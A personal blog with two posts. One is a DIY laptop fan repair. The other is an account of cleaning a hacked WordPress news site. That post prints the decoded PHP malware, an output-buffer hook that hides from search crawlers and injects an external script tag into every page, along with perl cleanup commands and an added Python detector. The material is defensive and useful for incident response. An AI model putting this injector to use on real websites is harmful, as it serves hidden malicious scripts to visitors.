Monday, May 17, 2010

Time-Pass Engineering

It was just a month after the warranty of my Latitude laptop had expired when the CPU fan stopped cooling the processor. It was good I realised it before the processor melted some day. The very next day after this realisation I called up Dell customer care and asked for a replacement fan; the customer care executive did some troubleshooting steps with the diagnostic disc supplied with the laptop and came to the conclusion that the fan had to be replaced. He promised to send me a quotation for the fan in a few days. Some days later I got an email saying that the product (fan) is EOL, so they can't supply it anymore. I was not able to use my laptop just because of this; only because I had another laptop given by my office was it not a trouble for me.

Some weeks later I opened my laptop and took the CPU fan out. My plan was to get it repaired with the help of some electrical shop; meanwhile I got some information about some laptop repair shops. At one shop I was told that the fan can't be repaired but they could get the same fan within a week, but after two weeks the shopkeeper refused as he was not able to find one for me. I tried another shop; he kept the fan for three days and finally called me back saying the fan is working. He asked me to bring the motherboard and offered to fix this. I was not willing to leave my machine at his shop and he refused to repair it in front of me. I got the fan back and thought to get it fixed later with someone else.

Once again I called up Dell and told them it is not the fan but the power connector on the motherboard which is not supplying any power to the fan. Last weekend I was not having any plans, and because of the hot sun outside I didn't want to go outside my room. I checked the power requirement of the fan: it was 5.0 volt. With the idea of checking it I bought three pencil cell batteries, each of 1.5 volt. With the help of a thin wire I connected the batteries to the fan wires and finally I saw the fan in working condition. Here I started my mind's engineering capability to fix the fan.
I connected two wires to the power connector of the fan and pasted transparent tape on it so that it doesn't create any short circuit with the motherboard. Then I found a place to keep two batteries inside the laptop body. I could have done some more research on the motherboard to find a suitable point where I could get the desired voltage for the fan, but unfortunately I was not having any multimeter kind of device to check the voltage coming out from the various available points on the motherboard. Then I thought that if I fix the fan directly to the batteries it will remain always on and the batteries will die soon. Now I was thinking to purchase a small switch button to control the fan. Looking at the datacard panel on the board I started the mechanical engineer portion of my mind. Have a look at the pictures next.
This picture above shows the switch in the off state.

This picture above shows the switch in the on state.

If you observe carefully you will see a black plastic stick; the purpose of the stick is to push out the internet datacard, which I don't use in my laptop as I have a USB wireless modem. I pasted one wire to this stick and the other wire to the iron plate with the help of adhesive. This was the most time-taking task as it needs to be done with complete perfection. Finally the switch is ready: all I have to do is pull the stick out to make the circuit on and push it back to turn the circuit off.

Next I carefully fixed the batteries and aligned the wires so that they don't cause any hindrance while closing the laptop. I fitted back all the components carefully and was ready to boot up my machine.

Just to keep an eye on the fan's working I enabled the temperature monitoring widget on my Fedora desktop, though I don't find any option to raise a sound alert in this applet. Maybe I will sit another weekend and look into the code of this Fedora desktop widget to have an option of setting a sound alarm when the temperature goes higher than a certain point.

Saturday, May 8, 2010

When WordPress Site was Hacked

Long ago I opted to read news online to avoid wasting newsprint; I bookmarked various news websites for reading news every morning, and it became a habit to check out the bookmarked websites early in the morning. Yesterday morning when I opened one of the bookmarked websites for news about Himachal, the website was redirecting me to some interesting page, and this page was offering some exe for cleaning up viruses from my computer. How funny.... the site was telling me to clean viruses from my Linux laptop.. ha ha ha..

Investigating more about the website I found this was happening from the server side. I passed on a message to the website owner, as he was known to me, saying that something is breaking on his site. Later I got a call from the website owner saying that some malicious code had been added to each page on the webserver. Here is the code he sent:
----code begins here----

<?php /**/ 
----code ends here----
Here is the expansion of the decoded string:
----expansion starts here ----
// Runs once per request: the $GLOBALS['mr_no'] flag stops it installing twice.
if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){
  $GLOBALS['mr_no']=1;
  if(!function_exists('mrobh')){
    if(!function_exists('gml')){
      // Returns the injected tag only when the visitor's User-Agent is not a
      // search-engine crawler, so the infection stays hidden from Google/Yahoo.
      function gml(){
        if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&& (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))){
          return base64_decode("PHNjcmlwdCBzcmM9Imh0dHA6Ly96ZXR0YXBldHRhLmNvbS9qcy5waHAiPjwvc2NyaXB0Pg==");
        }
        return "";
      }
    }
    if(!function_exists('gzdecode')){
      // Fallback gzip decoder for older PHP: parses the gzip header flags
      // (FEXTRA=4, FNAME=8, FCOMMENT=16, FHCRC=2) to find the deflate stream.
      function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){
        $R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1));
        $RBE4C4D037E939226F65812885A53DAD9=10;
        $RA3D52E52A48936CDE0F5356BB08652F2=0;
        if($R30B2AB8DC1496D06B230A71D8962AF5D&4){
          $R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2));
          $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1];
          $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB;
        }
        if($R30B2AB8DC1496D06B230A71D8962AF5D&8){
          $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
        }
        if($R30B2AB8DC1496D06B230A71D8962AF5D&16){
          $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
        }
        if($R30B2AB8DC1496D06B230A71D8962AF5D&2){
          $RBE4C4D037E939226F65812885A53DAD9+=2;
        }
        $R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9));
        if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){
          $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C;
        }
        return $R034AE2AB94F99CC81B389A1822DA3353;
      }
    }
    // Output-buffer callback: decompresses the page if needed and inserts the
    // script tag just before </body> (or at the very end when there is no body tag).
    function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){
      Header('Content-Encoding: none');
      $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B);
      if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){
        return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE);
      }else{
        return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml();
      }
    }
    // Every page that includes the injected file now passes its output through mrobh().
    ob_start('mrobh');
  }
}
----expansion ends here----

Well, it will take some more time for me to understand this. Later I was given shell access to this web server to check out the problem. I used perl to remove this code from the PHP file:

perl -p -i -e 's/.*=="\)\);\?>//g' FILE.php    # FILE.php stands for the infected file; -i edits it in place

But this was not enough; the website was giving errors even after this. It was a hard time: prior to this the website was redirecting, but now the website was getting displayed without CSS, and at this point I was more worried as the whole website was looking very ugly. I called up the website owner and the call was a relief for me; I was feeling the owner might be unhappy with me for giving this ugly look to his website, but he was calm, which motivated me. Struggling some more with the PHP files looking for some other malicious code, I checked out the error logs and found there were some problems in sending PHP headers, and I immediately remembered my college days when my PHP project stopped working because one empty line was added to the login page.

So I again executed the following perl command to clean up the empty lines:
perl -p -i -e 's/^\n//g' FILE.php    # FILE.php stands for the infected file

and the website was up again.

Here is the piece of code which can fix a similar problem in one go; all you need to do is move to the root directory of your webserver and execute:

find . -type f -name '*.php' | while IFS= read -r i; do perl -p -i -e 's/.*=="\)\);\?>[^.]*//g' "$i"; perl -p -i -e 's/^\n//' "$i"; done

I had to use two regular expressions as the newline character was giving me trouble. I would like to mention that this expression will work for the above-mentioned malicious code; you may have to tweak the expression if you have some other malicious code added to your WordPress site.
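As an added example, not from the post or from WordPress, here is a small Python script that does the same job as the perl one-liners above but looks before it cuts: it unwraps the nested base64_decode() layers of a file to expose the hooked ob_start() callback and the injected script tag, and then strips only the injector's own line, so the file's other blank lines are left alone. The shape of the injected line is assumed from the cleanup regex above, and the infected file is a constructed sample; the only value taken from the page is the base64 script-tag literal in the decoded expansion.

```python
import base64
import re
# Constructed infected file: the injector prepends a one-liner of the form
# <?php /**/ eval(base64_decode("..."));?> (shape assumed from the post's cleanup
# regex). INNER_PAYLOAD mirrors the decoded expansion; its base64 literal is the
# script-tag string quoted there.
INNER_PAYLOAD = (
    "if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){function gml(){"
    'return base64_decode("PHNjcmlwdCBzcmM9Imh0dHA6Ly96ZXR0YXBldHRhLmNvbS9qcy5waHAiPjwvc2NyaXB0Pg==");}'
    "ob_start('mrobh');}")
OUTER_B64 = base64.b64encode(INNER_PAYLOAD.encode()).decode()
INFECTED = ('<?php /**/ eval(base64_decode("' + OUTER_B64 + '"));?>\n'
            "<?php\n/* original theme header */\nget_header();\n")
B64_CALL = re.compile(r'base64_decode\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)')
INJECTOR = re.compile(r'<\?php\s*/\*\*/\s*eval\(base64_decode\("[A-Za-z0-9+/=]+"\)\);\?>')
SCRIPT_SRC = re.compile(r'<script\s+src=["\']([^"\']+)["\']', re.I)

def unwrap_layers(src, max_depth=5):
    """Decode each base64_decode("...") literal, recursing into the decoded text."""
    found = []  # (depth, decoded_text) for every layer found
    def walk(text, depth):
        if depth > max_depth:
            return
        for m in B64_CALL.finditer(text):
            try:
                decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
            except ValueError:
                continue  # not valid base64, ignore
            found.append((depth, decoded))
            walk(decoded, depth + 1)
    walk(src, 1)
    return found

def scan(src):
    """Indicators from the post: eval'd base64 one-liner, ob_start() hook, injected script."""
    layers = unwrap_layers(src)
    everything = src + "".join(text for _, text in layers)
    return {"eval_oneliner": bool(INJECTOR.search(src)),
            "ob_start_hook": "ob_start(" in everything,
            "injected_scripts": SCRIPT_SRC.findall(everything),  # found at any depth
            "layers": len(layers)}

def clean(src):
    """Strip the one-liner; drop its line only if nothing else was on it."""
    out = []
    for line in src.split("\n"):
        cleaned = INJECTOR.sub("", line)
        if cleaned != line and cleaned.strip() == "":
            continue  # a blank line before <?php is output and breaks header(); other blanks stay
        out.append(cleaned)
    return "\n".join(out)
```

Running scan() on a cleaned file is the check that the one-liners above do not give you: it confirms that no decoding layer still references ob_start() or an external script.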

If you don't have shell access to the webserver, another solution to such a problem can be updating WordPress; if you already have the latest version you get the option of reinstalling WordPress, which actually replaces all the affected PHP files, so your PHP files with malicious code will be cleaned automatically. In case you have a custom theme you have to update your theme files too, and also the plugins you are using in your WordPress site.

I am still confused how the hacker was able to add this PHP code; as I don't have sudo access on the webserver I could not find out more for you, will try to detect it somehow..

Happy WordPress people.. Happy Open Source..